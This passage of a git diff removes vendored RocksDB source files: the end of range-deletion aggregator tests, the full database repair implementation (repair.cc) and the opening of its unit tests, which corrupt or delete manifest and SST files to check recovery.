-TEST_F(RangeDelAggregatorTest, OverlapFully) {
-  VerifyRangeDels({{"a", "d", 10}, {"b", "c", 5}},
-                  {{" ", 0}, {"a", 10}, {"d", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, OverlapPoint) {
-  VerifyRangeDels({{"a", "b", 5}, {"b", "c", 10}},
-                  {{" ", 0}, {"a", 5}, {"b", 10}, {"c", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, SameStartKey) {
-  VerifyRangeDels({{"a", "c", 5}, {"a", "b", 10}},
-                  {{" ", 0}, {"a", 10}, {"b", 5}, {"c", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, SameEndKey) {
-  VerifyRangeDels({{"a", "d", 5}, {"b", "d", 10}},
-                  {{" ", 0}, {"a", 5}, {"b", 10}, {"d", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, GapsBetweenRanges) {
-  VerifyRangeDels(
-      {{"a", "b", 5}, {"c", "d", 10}, {"e", "f", 15}},
-      {{" ", 0}, {"a", 5}, {"b", 0}, {"c", 10}, {"d", 0}, {"e", 15}, {"f", 0}});
-}
-
-// Note the Cover* tests also test cases where tombstones are inserted under a
-// larger one when VerifyRangeDels() runs them in reverse
-TEST_F(RangeDelAggregatorTest, CoverMultipleFromLeft) {
-  VerifyRangeDels(
-      {{"b", "d", 5}, {"c", "f", 10}, {"e", "g", 15}, {"a", "f", 20}},
-      {{" ", 0}, {"a", 20}, {"f", 15}, {"g", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, CoverMultipleFromRight) {
-  VerifyRangeDels(
-      {{"b", "d", 5}, {"c", "f", 10}, {"e", "g", 15}, {"c", "h", 20}},
-      {{" ", 0}, {"b", 5}, {"c", 20}, {"h", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, CoverMultipleFully) {
-  VerifyRangeDels(
-      {{"b", "d", 5}, {"c", "f", 10}, {"e", "g", 15}, {"a", "h", 20}},
-      {{" ", 0}, {"a", 20}, {"h", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, AlternateMultipleAboveBelow) {
-  VerifyRangeDels(
-      {{"b", "d", 15}, {"c", "f", 10}, {"e", "g", 20}, {"a", "h", 5}},
-      {{" ", 0},
-       {"a", 5},
-       {"b", 15},
-       {"d", 10},
-       {"e", 20},
-       {"g", 5},
-       {"h", 0}});
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/repair.cc b/thirdparty/rocksdb/db/repair.cc
deleted file mode 100644
index 9ed3260..0000000
--- a/thirdparty/rocksdb/db/repair.cc
+++ /dev/null
@@ -1,650 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Repairer does best effort recovery to recover as much data as possible after
-// a disaster without compromising consistency. It does not guarantee bringing
-// the database to a time consistent state.
-//
-// Repair process is broken into 4 phases:
-// (a) Find files
-// (b) Convert logs to tables
-// (c) Extract metadata
-// (d) Write Descriptor
-//
-// (a) Find files
-//
-// The repairer goes through all the files in the directory, and classifies them
-// based on their file name. Any file that cannot be identified by name will be
-// ignored.
-//
-// (b) Convert logs to table
-//
-// Every log file that is active is replayed. All sections of the file where the
-// checksum does not match is skipped over. We intentionally give preference to
-// data consistency.
-//
-// (c) Extract metadata
-//
-// We scan every table to compute
-// (1) smallest/largest for the table
-// (2) largest sequence number in the table
-//
-// If we are unable to scan the file, then we ignore the table.
-//
-// (d) Write Descriptor
-//
-// We generate descriptor contents:
-//  - log number is set to zero
-//  - next-file-number is set to 1 + largest file number we found
-//  - last-sequence-number is set to largest sequence# found across
-//    all tables (see 2c)
-//  - compaction pointers are cleared
-//  - every table file is added at level 0
-//
-// Possible optimization 1:
-//   (a) Compute total size and use to pick appropriate max-level M
-//   (b) Sort tables by largest sequence# in the table
-//   (c) For each table: if it overlaps earlier table, place in level-0,
-//       else place in level-M.
-//   (d) We can provide options for time consistent recovery and unsafe recovery
-//       (ignore checksum failure when applicable)
-// Possible optimization 2:
-//   Store per-table metadata (smallest, largest, largest-seq#, ...)
-//   in the table's meta section to speed up ScanTable.
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include "db/builder.h"
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "db/memtable.h"
-#include "db/table_cache.h"
-#include "db/version_edit.h"
-#include "db/write_batch_internal.h"
-#include "options/cf_options.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-namespace {
-
-class Repairer {
- public:
-  Repairer(const std::string& dbname, const DBOptions& db_options,
-           const std::vector<ColumnFamilyDescriptor>& column_families,
-           const ColumnFamilyOptions& default_cf_opts,
-           const ColumnFamilyOptions& unknown_cf_opts, bool create_unknown_cfs)
-      : dbname_(dbname),
-        env_(db_options.env),
-        env_options_(),
-        db_options_(SanitizeOptions(dbname_, db_options)),
-        immutable_db_options_(db_options_),
-        icmp_(default_cf_opts.comparator),
-        default_cf_opts_(default_cf_opts),
-        default_cf_iopts_(
-            ImmutableCFOptions(immutable_db_options_, default_cf_opts)),
-        unknown_cf_opts_(unknown_cf_opts),
-        create_unknown_cfs_(create_unknown_cfs),
-        raw_table_cache_(
-            // TableCache can be small since we expect each table to be opened
-            // once.
-            NewLRUCache(10, db_options_.table_cache_numshardbits)),
-        table_cache_(new TableCache(default_cf_iopts_, env_options_,
-                                    raw_table_cache_.get())),
-        wb_(db_options_.db_write_buffer_size),
-        wc_(db_options_.delayed_write_rate),
-        vset_(dbname_, &immutable_db_options_, env_options_,
-              raw_table_cache_.get(), &wb_, &wc_),
-        next_file_number_(1) {
-    for (const auto& cfd : column_families) {
-      cf_name_to_opts_[cfd.name] = cfd.options;
-    }
-  }
-
-  const ColumnFamilyOptions* GetColumnFamilyOptions(
-      const std::string& cf_name) {
-    if (cf_name_to_opts_.find(cf_name) == cf_name_to_opts_.end()) {
-      if (create_unknown_cfs_) {
-        return &unknown_cf_opts_;
-      }
-      return nullptr;
-    }
-    return &cf_name_to_opts_[cf_name];
-  }
-
-  // Adds a column family to the VersionSet with cf_options_ and updates
-  // manifest.
-  Status AddColumnFamily(const std::string& cf_name, uint32_t cf_id) {
-    const auto* cf_opts = GetColumnFamilyOptions(cf_name);
-    if (cf_opts == nullptr) {
-      return Status::Corruption("Encountered unknown column family with name=" +
-                                cf_name + ", id=" + ToString(cf_id));
-    }
-    Options opts(db_options_, *cf_opts);
-    MutableCFOptions mut_cf_opts(opts);
-
-    VersionEdit edit;
-    edit.SetComparatorName(opts.comparator->Name());
-    edit.SetLogNumber(0);
-    edit.SetColumnFamily(cf_id);
-    ColumnFamilyData* cfd;
-    cfd = nullptr;
-    edit.AddColumnFamily(cf_name);
-
-    mutex_.Lock();
-    Status status = vset_.LogAndApply(cfd, mut_cf_opts, &edit, &mutex_,
-                                      nullptr /* db_directory */,
-                                      false /* new_descriptor_log */, cf_opts);
-    mutex_.Unlock();
-    return status;
-  }
-
-  ~Repairer() {
-    delete table_cache_;
-  }
-
-  Status Run() {
-    Status status = FindFiles();
-    if (status.ok()) {
-      // Discard older manifests and start a fresh one
-      for (size_t i = 0; i < manifests_.size(); i++) {
-        ArchiveFile(dbname_ + "/" + manifests_[i]);
-      }
-      // Just create a DBImpl temporarily so we can reuse NewDB()
-      DBImpl* db_impl = new DBImpl(db_options_, dbname_);
-      status = db_impl->NewDB();
-      delete db_impl;
-    }
-
-    if (status.ok()) {
-      // Recover using the fresh manifest created by NewDB()
-      status =
-          vset_.Recover({{kDefaultColumnFamilyName, default_cf_opts_}}, false);
-    }
-    if (status.ok()) {
-      // Need to scan existing SST files first so the column families are
-      // created before we process WAL files
-      ExtractMetaData();
-
-      // ExtractMetaData() uses table_fds_ to know which SST files' metadata to
-      // extract -- we need to clear it here since metadata for existing SST
-      // files has been extracted already
-      table_fds_.clear();
-      ConvertLogFilesToTables();
-      ExtractMetaData();
-      status = AddTables();
-    }
-    if (status.ok()) {
-      uint64_t bytes = 0;
-      for (size_t i = 0; i < tables_.size(); i++) {
-        bytes += tables_[i].meta.fd.GetFileSize();
-      }
-      ROCKS_LOG_WARN(db_options_.info_log,
-                     "**** Repaired rocksdb %s; "
-                     "recovered %" ROCKSDB_PRIszt " files; %" PRIu64
-                     "bytes. "
-                     "Some data may have been lost. "
-                     "****",
-                     dbname_.c_str(), tables_.size(), bytes);
-    }
-    return status;
-  }
-
- private:
-  struct TableInfo {
-    FileMetaData meta;
-    uint32_t column_family_id;
-    std::string column_family_name;
-    SequenceNumber min_sequence;
-    SequenceNumber max_sequence;
-  };
-
-  std::string const dbname_;
-  Env* const env_;
-  const EnvOptions env_options_;
-  const DBOptions db_options_;
-  const ImmutableDBOptions immutable_db_options_;
-  const InternalKeyComparator icmp_;
-  const ColumnFamilyOptions default_cf_opts_;
-  const ImmutableCFOptions default_cf_iopts_;  // table_cache_ holds reference
-  const ColumnFamilyOptions unknown_cf_opts_;
-  const bool create_unknown_cfs_;
-  std::shared_ptr<Cache> raw_table_cache_;
-  TableCache* table_cache_;
-  WriteBufferManager wb_;
-  WriteController wc_;
-  VersionSet vset_;
-  std::unordered_map<std::string, ColumnFamilyOptions> cf_name_to_opts_;
-  InstrumentedMutex mutex_;
-
-  std::vector<std::string> manifests_;
-  std::vector<FileDescriptor> table_fds_;
-  std::vector<uint64_t> logs_;
-  std::vector<TableInfo> tables_;
-  uint64_t next_file_number_;
-
-  Status FindFiles() {
-    std::vector<std::string> filenames;
-    bool found_file = false;
-    std::vector<std::string> to_search_paths;
-
-    for (size_t path_id = 0; path_id < db_options_.db_paths.size(); path_id++) {
-        to_search_paths.push_back(db_options_.db_paths[path_id].path);
-    }
-
-    // search wal_dir if user uses a customize wal_dir
-    if (!db_options_.wal_dir.empty() && 
-        db_options_.wal_dir != dbname_) {
-        to_search_paths.push_back(db_options_.wal_dir);
-    }
-
-    for (size_t path_id = 0; path_id < to_search_paths.size(); path_id++) {
-      Status status =
-          env_->GetChildren(to_search_paths[path_id], &filenames);
-      if (!status.ok()) {
-        return status;
-      }
-      if (!filenames.empty()) {
-        found_file = true;
-      }
-
-      uint64_t number;
-      FileType type;
-      for (size_t i = 0; i < filenames.size(); i++) {
-        if (ParseFileName(filenames[i], &number, &type)) {
-          if (type == kDescriptorFile) {
-            manifests_.push_back(filenames[i]);
-          } else {
-            if (number + 1 > next_file_number_) {
-              next_file_number_ = number + 1;
-            }
-            if (type == kLogFile) {
-              logs_.push_back(number);
-            } else if (type == kTableFile) {
-              table_fds_.emplace_back(number, static_cast<uint32_t>(path_id),
-                                      0);
-            } else {
-              // Ignore other files
-            }
-          }
-        }
-      }
-    }
-    if (!found_file) {
-      return Status::Corruption(dbname_, "repair found no files");
-    }
-    return Status::OK();
-  }
-
-  void ConvertLogFilesToTables() {
-    for (size_t i = 0; i < logs_.size(); i++) {
-      // we should use LogFileName(wal_dir, logs_[i]) here. user might uses wal_dir option.
-      std::string logname = LogFileName(db_options_.wal_dir, logs_[i]);
-      Status status = ConvertLogToTable(logs_[i]);
-      if (!status.ok()) {
-        ROCKS_LOG_WARN(db_options_.info_log,
-                       "Log #%" PRIu64 ": ignoring conversion error: %s",
-                       logs_[i], status.ToString().c_str());
-      }
-      ArchiveFile(logname);
-    }
-  }
-
-  Status ConvertLogToTable(uint64_t log) {
-    struct LogReporter : public log::Reader::Reporter {
-      Env* env;
-      std::shared_ptr<Logger> info_log;
-      uint64_t lognum;
-      virtual void Corruption(size_t bytes, const Status& s) override {
-        // We print error messages for corruption, but continue repairing.
-        ROCKS_LOG_ERROR(info_log, "Log #%" PRIu64 ": dropping %d bytes; %s",
-                        lognum, static_cast<int>(bytes), s.ToString().c_str());
-      }
-    };
-
-    // Open the log file
-    std::string logname = LogFileName(db_options_.wal_dir, log);
-    unique_ptr<SequentialFile> lfile;
-    Status status = env_->NewSequentialFile(
-        logname, &lfile, env_->OptimizeForLogRead(env_options_));
-    if (!status.ok()) {
-      return status;
-    }
-    unique_ptr<SequentialFileReader> lfile_reader(
-        new SequentialFileReader(std::move(lfile)));
-
-    // Create the log reader.
-    LogReporter reporter;
-    reporter.env = env_;
-    reporter.info_log = db_options_.info_log;
-    reporter.lognum = log;
-    // We intentionally make log::Reader do checksumming so that
-    // corruptions cause entire commits to be skipped instead of
-    // propagating bad information (like overly large sequence
-    // numbers).
-    log::Reader reader(db_options_.info_log, std::move(lfile_reader), &reporter,
-                       true /*enable checksum*/, 0 /*initial_offset*/, log);
-
-    // Initialize per-column family memtables
-    for (auto* cfd : *vset_.GetColumnFamilySet()) {
-      cfd->CreateNewMemtable(*cfd->GetLatestMutableCFOptions(),
-                             kMaxSequenceNumber);
-    }
-    auto cf_mems = new ColumnFamilyMemTablesImpl(vset_.GetColumnFamilySet());
-
-    // Read all the records and add to a memtable
-    std::string scratch;
-    Slice record;
-    WriteBatch batch;
-    int counter = 0;
-    while (reader.ReadRecord(&record, &scratch)) {
-      if (record.size() < WriteBatchInternal::kHeader) {
-        reporter.Corruption(
-            record.size(), Status::Corruption("log record too small"));
-        continue;
-      }
-      WriteBatchInternal::SetContents(&batch, record);
-      status = WriteBatchInternal::InsertInto(&batch, cf_mems, nullptr);
-      if (status.ok()) {
-        counter += WriteBatchInternal::Count(&batch);
-      } else {
-        ROCKS_LOG_WARN(db_options_.info_log, "Log #%" PRIu64 ": ignoring %s",
-                       log, status.ToString().c_str());
-        status = Status::OK();  // Keep going with rest of file
-      }
-    }
-
-    // Dump a table for each column family with entries in this log file.
-    for (auto* cfd : *vset_.GetColumnFamilySet()) {
-      // Do not record a version edit for this conversion to a Table
-      // since ExtractMetaData() will also generate edits.
-      MemTable* mem = cfd->mem();
-      if (mem->IsEmpty()) {
-        continue;
-      }
-
-      FileMetaData meta;
-      meta.fd = FileDescriptor(next_file_number_++, 0, 0);
-      ReadOptions ro;
-      ro.total_order_seek = true;
-      Arena arena;
-      ScopedArenaIterator iter(mem->NewIterator(ro, &arena));
-      EnvOptions optimized_env_options =
-          env_->OptimizeForCompactionTableWrite(env_options_, immutable_db_options_);
-
-      int64_t _current_time = 0;
-      status = env_->GetCurrentTime(&_current_time);  // ignore error
-      const uint64_t current_time = static_cast<uint64_t>(_current_time);
-
-      status = BuildTable(
-          dbname_, env_, *cfd->ioptions(), *cfd->GetLatestMutableCFOptions(),
-          optimized_env_options, table_cache_, iter.get(),
-          std::unique_ptr<InternalIterator>(mem->NewRangeTombstoneIterator(ro)),
-          &meta, cfd->internal_comparator(),
-          cfd->int_tbl_prop_collector_factories(), cfd->GetID(), cfd->GetName(),
-          {}, kMaxSequenceNumber, kNoCompression, CompressionOptions(), false,
-          nullptr /* internal_stats */, TableFileCreationReason::kRecovery,
-          nullptr /* event_logger */, 0 /* job_id */, Env::IO_HIGH,
-          nullptr /* table_properties */, -1 /* level */, current_time);
-      ROCKS_LOG_INFO(db_options_.info_log,
-                     "Log #%" PRIu64 ": %d ops saved to Table #%" PRIu64 " %s",
-                     log, counter, meta.fd.GetNumber(),
-                     status.ToString().c_str());
-      if (status.ok()) {
-        if (meta.fd.GetFileSize() > 0) {
-          table_fds_.push_back(meta.fd);
-        }
-      } else {
-        break;
-      }
-    }
-    delete cf_mems;
-    return status;
-  }
-
-  void ExtractMetaData() {
-    for (size_t i = 0; i < table_fds_.size(); i++) {
-      TableInfo t;
-      t.meta.fd = table_fds_[i];
-      Status status = ScanTable(&t);
-      if (!status.ok()) {
-        std::string fname = TableFileName(
-            db_options_.db_paths, t.meta.fd.GetNumber(), t.meta.fd.GetPathId());
-        char file_num_buf[kFormatFileNumberBufSize];
-        FormatFileNumber(t.meta.fd.GetNumber(), t.meta.fd.GetPathId(),
-                         file_num_buf, sizeof(file_num_buf));
-        ROCKS_LOG_WARN(db_options_.info_log, "Table #%s: ignoring %s",
-                       file_num_buf, status.ToString().c_str());
-        ArchiveFile(fname);
-      } else {
-        tables_.push_back(t);
-      }
-    }
-  }
-
-  Status ScanTable(TableInfo* t) {
-    std::string fname = TableFileName(
-        db_options_.db_paths, t->meta.fd.GetNumber(), t->meta.fd.GetPathId());
-    int counter = 0;
-    uint64_t file_size;
-    Status status = env_->GetFileSize(fname, &file_size);
-    t->meta.fd = FileDescriptor(t->meta.fd.GetNumber(), t->meta.fd.GetPathId(),
-                                file_size);
-    std::shared_ptr<const TableProperties> props;
-    if (status.ok()) {
-      status = table_cache_->GetTableProperties(env_options_, icmp_, t->meta.fd,
-                                                &props);
-    }
-    if (status.ok()) {
-      t->column_family_id = static_cast<uint32_t>(props->column_family_id);
-      if (t->column_family_id ==
-          TablePropertiesCollectorFactory::Context::kUnknownColumnFamily) {
-        ROCKS_LOG_WARN(
-            db_options_.info_log,
-            "Table #%" PRIu64
-            ": column family unknown (probably due to legacy format); "
-            "adding to default column family id 0.",
-            t->meta.fd.GetNumber());
-        t->column_family_id = 0;
-      }
-
-      if (vset_.GetColumnFamilySet()->GetColumnFamily(t->column_family_id) ==
-          nullptr) {
-        status =
-            AddColumnFamily(props->column_family_name, t->column_family_id);
-      }
-    }
-    ColumnFamilyData* cfd = nullptr;
-    if (status.ok()) {
-      cfd = vset_.GetColumnFamilySet()->GetColumnFamily(t->column_family_id);
-      if (cfd->GetName() != props->column_family_name) {
-        ROCKS_LOG_ERROR(
-            db_options_.info_log,
-            "Table #%" PRIu64
-            ": inconsistent column family name '%s'; expected '%s' for column "
-            "family id %" PRIu32 ".",
-            t->meta.fd.GetNumber(), props->column_family_name.c_str(),
-            cfd->GetName().c_str(), t->column_family_id);
-        status = Status::Corruption(dbname_, "inconsistent column family name");
-      }
-    }
-    if (status.ok()) {
-      InternalIterator* iter = table_cache_->NewIterator(
-          ReadOptions(), env_options_, cfd->internal_comparator(), t->meta.fd,
-          nullptr /* range_del_agg */);
-      bool empty = true;
-      ParsedInternalKey parsed;
-      t->min_sequence = 0;
-      t->max_sequence = 0;
-      for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-        Slice key = iter->key();
-        if (!ParseInternalKey(key, &parsed)) {
-          ROCKS_LOG_ERROR(db_options_.info_log,
-                          "Table #%" PRIu64 ": unparsable key %s",
-                          t->meta.fd.GetNumber(), EscapeString(key).c_str());
-          continue;
-        }
-
-        counter++;
-        if (empty) {
-          empty = false;
-          t->meta.smallest.DecodeFrom(key);
-          t->min_sequence = parsed.sequence;
-        }
-        t->meta.largest.DecodeFrom(key);
-        if (parsed.sequence < t->min_sequence) {
-          t->min_sequence = parsed.sequence;
-        }
-        if (parsed.sequence > t->max_sequence) {
-          t->max_sequence = parsed.sequence;
-        }
-      }
-      if (!iter->status().ok()) {
-        status = iter->status();
-      }
-      delete iter;
-
-      ROCKS_LOG_INFO(db_options_.info_log, "Table #%" PRIu64 ": %d entries %s",
-                     t->meta.fd.GetNumber(), counter,
-                     status.ToString().c_str());
-    }
-    return status;
-  }
-
-  Status AddTables() {
-    std::unordered_map<uint32_t, std::vector<const TableInfo*>> cf_id_to_tables;
-    SequenceNumber max_sequence = 0;
-    for (size_t i = 0; i < tables_.size(); i++) {
-      cf_id_to_tables[tables_[i].column_family_id].push_back(&tables_[i]);
-      if (max_sequence < tables_[i].max_sequence) {
-        max_sequence = tables_[i].max_sequence;
-      }
-    }
-    vset_.SetLastToBeWrittenSequence(max_sequence);
-    vset_.SetLastSequence(max_sequence);
-
-    for (const auto& cf_id_and_tables : cf_id_to_tables) {
-      auto* cfd =
-          vset_.GetColumnFamilySet()->GetColumnFamily(cf_id_and_tables.first);
-      VersionEdit edit;
-      edit.SetComparatorName(cfd->user_comparator()->Name());
-      edit.SetLogNumber(0);
-      edit.SetNextFile(next_file_number_);
-      edit.SetColumnFamily(cfd->GetID());
-
-      // TODO(opt): separate out into multiple levels
-      for (const auto* table : cf_id_and_tables.second) {
-        edit.AddFile(0, table->meta.fd.GetNumber(), table->meta.fd.GetPathId(),
-                     table->meta.fd.GetFileSize(), table->meta.smallest,
-                     table->meta.largest, table->min_sequence,
-                     table->max_sequence, table->meta.marked_for_compaction);
-      }
-      mutex_.Lock();
-      Status status = vset_.LogAndApply(
-          cfd, *cfd->GetLatestMutableCFOptions(), &edit, &mutex_,
-          nullptr /* db_directory */, false /* new_descriptor_log */);
-      mutex_.Unlock();
-      if (!status.ok()) {
-        return status;
-      }
-    }
-    return Status::OK();
-  }
-
-  void ArchiveFile(const std::string& fname) {
-    // Move into another directory.  E.g., for
-    //    dir/foo
-    // rename to
-    //    dir/lost/foo
-    const char* slash = strrchr(fname.c_str(), '/');
-    std::string new_dir;
-    if (slash != nullptr) {
-      new_dir.assign(fname.data(), slash - fname.data());
-    }
-    new_dir.append("/lost");
-    env_->CreateDir(new_dir);  // Ignore error
-    std::string new_file = new_dir;
-    new_file.append("/");
-    new_file.append((slash == nullptr) ? fname.c_str() : slash + 1);
-    Status s = env_->RenameFile(fname, new_file);
-    ROCKS_LOG_INFO(db_options_.info_log, "Archiving %s: %s\n", fname.c_str(),
-                   s.ToString().c_str());
-  }
-};
-
-Status GetDefaultCFOptions(
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    ColumnFamilyOptions* res) {
-  assert(res != nullptr);
-  auto iter = std::find_if(column_families.begin(), column_families.end(),
-                           [](const ColumnFamilyDescriptor& cfd) {
-                             return cfd.name == kDefaultColumnFamilyName;
-                           });
-  if (iter == column_families.end()) {
-    return Status::InvalidArgument(
-        "column_families", "Must contain entry for default column family");
-  }
-  *res = iter->options;
-  return Status::OK();
-}
-}  // anonymous namespace
-
-Status RepairDB(const std::string& dbname, const DBOptions& db_options,
-                const std::vector<ColumnFamilyDescriptor>& column_families) {
-  ColumnFamilyOptions default_cf_opts;
-  Status status = GetDefaultCFOptions(column_families, &default_cf_opts);
-  if (status.ok()) {
-    Repairer repairer(dbname, db_options, column_families, default_cf_opts,
-                      ColumnFamilyOptions() /* unknown_cf_opts */,
-                      false /* create_unknown_cfs */);
-    status = repairer.Run();
-  }
-  return status;
-}
-
-Status RepairDB(const std::string& dbname, const DBOptions& db_options,
-                const std::vector<ColumnFamilyDescriptor>& column_families,
-                const ColumnFamilyOptions& unknown_cf_opts) {
-  ColumnFamilyOptions default_cf_opts;
-  Status status = GetDefaultCFOptions(column_families, &default_cf_opts);
-  if (status.ok()) {
-    Repairer repairer(dbname, db_options, column_families, default_cf_opts,
-                      unknown_cf_opts, true /* create_unknown_cfs */);
-    status = repairer.Run();
-  }
-  return status;
-}
-
-Status RepairDB(const std::string& dbname, const Options& options) {
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  Repairer repairer(dbname, db_options, {}, cf_options /* default_cf_opts */,
-                    cf_options /* unknown_cf_opts */,
-                    true /* create_unknown_cfs */);
-  return repairer.Run();
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/repair_test.cc b/thirdparty/rocksdb/db/repair_test.cc
deleted file mode 100644
index b267c6d..0000000
--- a/thirdparty/rocksdb/db/repair_test.cc
+++ /dev/null
@@ -1,328 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <string>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "db/db_test_util.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/transaction_log.h"
-#include "util/file_util.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-class RepairTest : public DBTestBase {
- public:
-  RepairTest() : DBTestBase("/repair_test") {}
-
-  std::string GetFirstSstPath() {
-    uint64_t manifest_size;
-    std::vector<std::string> files;
-    db_->GetLiveFiles(files, &manifest_size);
-    auto sst_iter =
-        std::find_if(files.begin(), files.end(), [](const std::string& file) {
-          uint64_t number;
-          FileType type;
-          bool ok = ParseFileName(file, &number, &type);
-          return ok && type == kTableFile;
-        });
-    return sst_iter == files.end() ? "" : dbname_ + *sst_iter;
-  }
-};
-
-TEST_F(RepairTest, LostManifest) {
-  // Add a couple SST files, delete the manifest, and verify RepairDB() saves
-  // the day.
-  Put("key", "val");
-  Flush();
-  Put("key2", "val2");
-  Flush();
-  // Need to get path before Close() deletes db_, but delete it after Close() to
-  // ensure Close() didn't change the manifest.
-  std::string manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-
-  Close();
-  ASSERT_OK(env_->FileExists(manifest_path));
-  ASSERT_OK(env_->DeleteFile(manifest_path));
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-  Reopen(CurrentOptions());
-
-  ASSERT_EQ(Get("key"), "val");
-  ASSERT_EQ(Get("key2"), "val2");
-}
-
-TEST_F(RepairTest, CorruptManifest) {
-  // Manifest is in an invalid format. Expect a full recovery.
-  Put("key", "val");
-  Flush();
-  Put("key2", "val2");
-  Flush();
-  // Need to get path before Close() deletes db_, but overwrite it after Close()
-  // to ensure Close() didn't change the manifest.
-  std::string manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-
-  Close();
-  ASSERT_OK(env_->FileExists(manifest_path));
-  CreateFile(env_, manifest_path, "blah");
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-  Reopen(CurrentOptions());
-
-  ASSERT_EQ(Get("key"), "val");
-  ASSERT_EQ(Get("key2"), "val2");
-}
-
-TEST_F(RepairTest, IncompleteManifest) {
-  // In this case, the manifest is valid but does not reference all of the SST
-  // files. Expect a full recovery.
-  Put("key", "val");
-  Flush();
-  std::string orig_manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-  CopyFile(orig_manifest_path, orig_manifest_path + ".tmp");
-  Put("key2", "val2");
-  Flush();
-  // Need to get path before Close() deletes db_, but overwrite it after Close()
-  // to ensure Close() didn't change the manifest.
-  std::string new_manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-
-  Close();
-  ASSERT_OK(env_->FileExists(new_manifest_path));
-  // Replace the manifest with one that is only aware of the first SST file.
-  CopyFile(orig_manifest_path + ".tmp", new_manifest_path);
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-  Reopen(CurrentOptions());
-
-  ASSERT_EQ(Get("key"), "val");
-  ASSERT_EQ(Get("key2"), "val2");
-}
-
-TEST_F(RepairTest, LostSst) {
-  // Delete one of the SST files but preserve the manifest that refers to it,
-  // then verify the DB is still usable for the intact SST.
-  Put("key", "val");
-  Flush();
-  Put("key2", "val2");
-  Flush();
-  auto sst_path = GetFirstSstPath();
-  ASSERT_FALSE(sst_path.empty());
-  ASSERT_OK(env_->DeleteFile(sst_path));
-
-  Close();
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-  Reopen(CurrentOptions());
-
-  // Exactly one of the key-value pairs should be in the DB now.
-  ASSERT_TRUE((Get("key") == "val") != (Get("key2") == "val2"));
-}
-
-TEST_F(RepairTest, CorruptSst) {
-  // Corrupt one of the SST files but preserve the manifest that refers to it,
-  // then verify the DB is still usable for the intact SST.
-  Put("key", "val");
-  Flush();
-  Put("key2", "val2");
-  Flush();
-  auto sst_path = GetFirstSstPath();
-  ASSERT_FALSE(sst_path.empty());
-  CreateFile(env_, sst_path, "blah");
-
-  Close();
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-  Reopen(CurrentOptions());
-
-  // Exactly one of the key-value pairs should be in the DB now.
-  ASSERT_TRUE((Get("key") == "val") != (Get("key2") == "val2"));
-}
-
-TEST_F(RepairTest, UnflushedSst) {
-  // This test case invokes repair while some data is unflushed, then verifies
-  // that data is in the db.
-  Put("key", "val");
-  VectorLogPtr wal_files;
-  ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files));
-  ASSERT_EQ(wal_files.size(), 1);
-  uint64_t total_ssts_size;
-  GetAllSSTFiles(&total_ssts_size);
-  ASSERT_EQ(total_ssts_size, 0);
-  // Need to get path before Close() deletes db_, but delete it after Close() to
-  // ensure Close() didn't change the manifest.
-  std::string manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-
-  Close();
-  ASSERT_OK(env_->FileExists(manifest_path));
-  ASSERT_OK(env_->DeleteFile(manifest_path));
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-  Reopen(CurrentOptions());
-
-  ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files));
-  ASSERT_EQ(wal_files.size(), 0);
-  GetAllSSTFiles(&total_ssts_size);
-  ASSERT_GT(total_ssts_size, 0);
-  ASSERT_EQ(Get("key"), "val");
-}
-
-TEST_F(RepairTest, SeparateWalDir) {
-  do {
-    Options options = CurrentOptions();
-    DestroyAndReopen(options);
-    Put("key", "val");
-    Put("foo", "bar");
-    VectorLogPtr wal_files;
